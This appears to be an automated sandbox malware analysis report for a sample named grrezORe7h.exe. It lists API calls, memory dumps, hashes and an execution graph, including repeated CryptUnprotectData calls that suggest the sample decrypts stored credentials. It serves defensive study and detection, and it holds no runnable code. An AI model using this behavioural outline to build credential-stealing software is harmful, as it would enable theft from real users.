                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3585118688-0
                                                                                                                      • Opcode ID: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                                      • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                                      • Opcode Fuzzy Hash: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                                      • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                      • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2102729457-0
                                                                                                                      • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                      • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                                      • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                      • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                        • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 00405AC2
                                                                                                                        • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                        • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                      • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 00405B6A
                                                                                                                      • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A
                                                                                                                      Strings
                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                      • API String ID: 3248276644-3081826266
                                                                                                                      • Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                      • Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
                                                                                                                      • Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                      • Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                      • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                      Strings
                                                                                                                      • Error launching installer, xrefs: 00405748
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                      • String ID: Error launching installer
                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                      • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                      • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                                      • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                      • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 0040382A
                                                                                                                      Strings
                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403809
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                      • API String ID: 1100898210-3081826266
                                                                                                                      • Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                                      • Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
                                                                                                                      • Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                                      • Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8
                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\grrezORe7h.exe,C:\Users\user\Desktop\grrezORe7h.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
                                                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\grrezORe7h.exe,C:\Users\user\Desktop\grrezORe7h.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharPrevlstrlen
                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                      • API String ID: 2709904686-224404859
                                                                                                                      • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                      • Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
                                                                                                                      • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                      • Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9
                                                                                                                      APIs
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1780285237-0
                                                                                                                      • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                      • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                      • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                      • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                      APIs
                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                      • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 190613189-0
                                                                                                                      • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                      • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                      • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                      • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:11%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:2.4%
                                                                                                                      Total number of Nodes:246
                                                                                                                      Total number of Limit Nodes:18
                                                                                                                      execution_graph 40488 377de708 DispatchMessageW 40489 377de774 40488->40489 40490 ad030 40491 ad048 40490->40491 40492 ad0a2 40491->40492 40499 377d1bd0 40491->40499 40505 377d02b7 40491->40505 40510 377d02c8 40491->40510 40515 377d032d 40491->40515 40520 377d03f0 40491->40520 40523 377d1bc0 40491->40523 40500 377d1bfd 40499->40500 40501 377d1c2f 40500->40501 40529 377d1d58 40500->40529 40538 377d9b3a 40500->40538 40543 377d9b48 40500->40543 40506 377d02c8 40505->40506 40507 377d030f 40506->40507 40508 377d1bd0 2 API calls 40506->40508 40509 377d1bc0 2 API calls 40506->40509 40507->40492 40508->40507 40509->40507 40511 377d02ee 40510->40511 40512 377d030f 40511->40512 40513 377d1bd0 2 API calls 40511->40513 40514 377d1bc0 2 API calls 40511->40514 40512->40492 40513->40512 40514->40512 40516 377d02fc 40515->40516 40517 377d030f 40516->40517 40518 377d1bd0 2 API calls 40516->40518 40519 377d1bc0 2 API calls 40516->40519 40517->40492 40518->40517 40519->40517 40521 377d0407 40520->40521 40577 377d0841 40520->40577 40521->40492 40524 377d1bd0 40523->40524 40525 377d1c2f 40524->40525 40526 377d1d58 2 API calls 40524->40526 40527 377d9b48 CallWindowProcW 40524->40527 40528 377d9b3a CallWindowProcW 40524->40528 40526->40525 40527->40525 40528->40525 40530 377d1d66 40529->40530 40531 377d1d93 40529->40531 40532 377d1d6e 40530->40532 40552 377d1dc0 40530->40552 40531->40530 40533 377d1d98 40531->40533 40532->40501 40548 377d17d0 40533->40548 40535 377d1da4 40535->40501 40540 377d9b48 40538->40540 40539 377d9be8 40539->40501 40560 377d9bef 40540->40560 40566 377d9c00 40540->40566 40544 377d9b5c 40543->40544 40546 377d9bef CallWindowProcW 40544->40546 40547 377d9c00 CallWindowProcW 40544->40547 40545 377d9be8 40545->40501 40546->40545 40547->40545 40549 377d17db 40548->40549 40556 377d181c 40549->40556 40551 377d22f5 40551->40535 40553 377d1e02 40552->40553 40555 377d1dac 40552->40555 40554 377d1e5a CallWindowProcW 40553->40554 40553->40555 40554->40555 40555->40501 40557 377d1827 40556->40557 40558 377d2461 GetCurrentThreadId 40557->40558 40559 377d248b 40557->40559 40558->40559 40559->40551 40561 377d9c37 40560->40561 40562 377d9c00 40560->40562 40563 377d9c11 40562->40563 40570 377daf2b 40562->40570 40574 377db040 40562->40574 40563->40539 40567 377daf2b CallWindowProcW 40566->40567 40568 377d9c11 40566->40568 40569 377db040 CallWindowProcW 40566->40569 40567->40568 40568->40539 40569->40568 40572 377daf34 40570->40572 40571 377daeee 40571->40563 40572->40571 40573 377d1dc0 CallWindowProcW 40572->40573 40573->40571 40576 377d1dc0 CallWindowProcW 40574->40576 40575 377db05a 40575->40563 40576->40575 40578 377d0856 40577->40578 40579 377d0938 6 API calls 40577->40579 40578->40521 40579->40578 40580 373ace60 40581 373ace7c 40580->40581 40584 373a94b4 40581->40584 40583 373ace9b 40585 373a94bf 40584->40585 40586 373acf4f 40585->40586 40589 373acf68 40585->40589 40593 373acf59 40585->40593 40586->40583 40590 373acf96 40589->40590 40591 373ad021 40590->40591 40597 373a95e8 40590->40597 40591->40591 40594 373acf67 40593->40594 40595 373ad021 40594->40595 40596 373a95e8 3 API calls 40594->40596 40595->40595 40596->40595 40598 373a95f3 40597->40598 40600 373aec47 40598->40600 40601 373ae7f4 40598->40601 40600->40591 40603 373ae7ff 40601->40603 40602 373af111 40602->40600 40603->40602 40604 373afab0 3 API calls 40603->40604 40605 373afaa1 3 API calls 40603->40605 40604->40602 40605->40602 40308 15b158 40312 15b174 40308->40312 40309 15b1a3 40332 377d2730 40309->40332 40316 36ec0198 40312->40316 40321 36ec0160 40312->40321 40327 36ec0194 40312->40327 40317 36ec01a2 40316->40317 40338 36ecc638 40317->40338 40342 36ecc64d 40317->40342 40318 36ec01da 40318->40309 40322 36ec013e 40321->40322 40323 36ec016a 40321->40323 40322->40309 40325 36ecc64d CryptUnprotectData 40323->40325 40326 36ecc638 CryptUnprotectData 40323->40326 40324 36ec01da 40324->40309 40325->40324 40326->40324 40328 36ec01a2 40327->40328 40330 36ecc64d CryptUnprotectData 40328->40330 40331 36ecc638 CryptUnprotectData 40328->40331 40329 36ec01da 40329->40309 40330->40329 40331->40329 40333 377d273f 40332->40333 40374 377d0938 40333->40374 40340 36ecc631 40338->40340 40339 36eccaf9 40339->40318 40340->40338 40340->40339 40346 36eccf01 40340->40346 40344 36ecc66a 40342->40344 40343 36eccaf9 40343->40318 40344->40343 40345 36eccf01 CryptUnprotectData 40344->40345 40345->40344 40347 36eccf10 40346->40347 40351 36ecd540 40347->40351 40359 36ecd550 40347->40359 40348 36eccf80 40348->40340 40352 36ecd550 40351->40352 40353 36ecd629 40352->40353 40357 36ecd540 CryptUnprotectData 40352->40357 40358 36ecd550 CryptUnprotectData 40352->40358 40367 36ecd730 40352->40367 40371 36ecd1ec 40353->40371 40357->40353 40358->40353 40360 36ecd575 40359->40360 40361 36ecd629 40359->40361 40360->40361 40364 36ecd730 CryptUnprotectData 40360->40364 40365 36ecd540 CryptUnprotectData 40360->40365 40366 36ecd550 CryptUnprotectData 40360->40366 40362 36ecd1ec CryptUnprotectData 40361->40362 40363 36ecd7f5 40362->40363 40363->40348 40364->40361 40365->40361 40366->40361 40368 36ecd745 40367->40368 40369 36ecd1ec CryptUnprotectData 40368->40369 40370 36ecd7f5 40369->40370 40370->40353 40372 36ecd9e0 CryptUnprotectData 40371->40372 40373 36ecd7f5 40372->40373 40373->40348 40375 377d0948 40374->40375 40376 377d0965 40375->40376 40382 377d0980 40375->40382 40378 377d188c 40376->40378 40379 377d1897 40378->40379 40381 377d2866 40379->40381 40405 377d1934 40379->40405 40383 377d09c6 GetCurrentProcess 40382->40383 40385 377d0a18 GetCurrentThread 40383->40385 40386 377d0a11 40383->40386 40387 377d0a4e 40385->40387 40388 377d0a55 GetCurrentProcess 40385->40388 40386->40385 40387->40388 40389 377d0a8b 40388->40389 40394 377d0b4f 40389->40394 40398 377d0f31 40389->40398 40390 377d0ab3 GetCurrentThreadId 40391 377d0ae4 40390->40391 40391->40376 40400 377d0bc8 DuplicateHandle 40394->40400 40402 377d0bc0 40394->40402 40395 377d0b8e 40395->40390 40399 377d0f3a 40398->40399 40399->40390 40401 377d0c5e 40400->40401 40401->40395 40403 377d0bc8 DuplicateHandle 40402->40403 40404 377d0c5e 40403->40404 40404->40395 40407 377d193f 40405->40407 40406 377d2e79 40408 377d2ea9 40406->40408 40410 377d2ac4 7 API calls 40406->40410 40407->40406 40412 377d2ed4 40407->40412 40415 377d3e40 40407->40415 40408->40412 40419 377d2ac4 40408->40419 40410->40408 40411 377d2ec1 40425 377dd6c1 40411->40425 40412->40379 40416 377d3e61 40415->40416 40417 377d3e85 40416->40417 40431 377d3ff0 40416->40431 40417->40406 40420 377d2acf 40419->40420 40421 377d0938 6 API calls 40420->40421 40424 377dd0a1 40420->40424 40422 377dd0bb 40421->40422 40481 377dc544 40422->40481 40424->40411 40430 377dd6f1 40425->40430 40426 377dd899 40427 377d0938 6 API calls 40426->40427 40429 377dd77c 40427->40429 40428 377ddad0 WaitMessage 40428->40430 40430->40426 40430->40428 40430->40429 40432 377d3ffd 40431->40432 40433 377d0938 6 API calls 40432->40433 40434 377d402b 40433->40434 40435 377d4036 40434->40435 40437 377d2bec 40434->40437 40435->40417 40438 377d2bf7 40437->40438 40440 377d40a8 40438->40440 40441 377d2c20 40438->40441 40442 377d2c2b 40441->40442 40447 377d2c30 40442->40447 40444 377d4517 40451 377d91f0 40444->40451 40450 377d2c3b 40447->40450 40448 377d57a0 40448->40444 40449 377d3e40 9 API calls 40449->40448 40450->40448 40450->40449 40453 377d9321 40451->40453 40454 377d9221 40451->40454 40452 377d4551 40452->40440 40454->40452 40457 373afab0 40454->40457 40462 373afaa1 40454->40462 40459 373afadb 40457->40459 40458 373afb8a 40458->40458 40459->40458 40467 377d00c5 40459->40467 40476 377d00c0 40459->40476 40463 373afab0 40462->40463 40464 373afb8a 40463->40464 40465 377d00c5 3 API calls 40463->40465 40466 377d00c0 3 API calls 40463->40466 40465->40464 40466->40464 40468 377d00fd CreateWindowExW 40467->40468 40469 377d00c9 40467->40469 40472 377d0234 40468->40472 40473 377d00c5 CreateWindowExW CreateWindowExW 40469->40473 40474 377d0104 CreateWindowExW 40469->40474 40475 377d0110 CreateWindowExW 40469->40475 40470 377d00f5 40470->40458 40473->40470 40474->40470 40475->40470 40477 377d00f5 40476->40477 40478 377d00c5 CreateWindowExW CreateWindowExW CreateWindowExW 40476->40478 40479 377d0104 CreateWindowExW 40476->40479 40480 377d0110 CreateWindowExW 40476->40480 40477->40458 40478->40477 40479->40477 40480->40477 40483 377dc54f 40481->40483 40482 377dd3bb 40482->40424 40483->40482 40485 377dc560 40483->40485 40486 377dd3f0 OleInitialize 40485->40486 40487 377dd454 40486->40487 40487->40482 40606 377d2020 SetTimer 40607 377d208c 40606->40607 40608 377d20c0 40611 377d20ed 40608->40611 40609 377d213c 40609->40609 40611->40609 40612 377d17fc 40611->40612 40613 377d1807 40612->40613 40614 377d17d0 GetCurrentThreadId 40613->40614 40615 377d229c 40614->40615 40617 373a95e8 3 API calls 40615->40617 40616 377d22a5 40616->40609 40617->40616

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
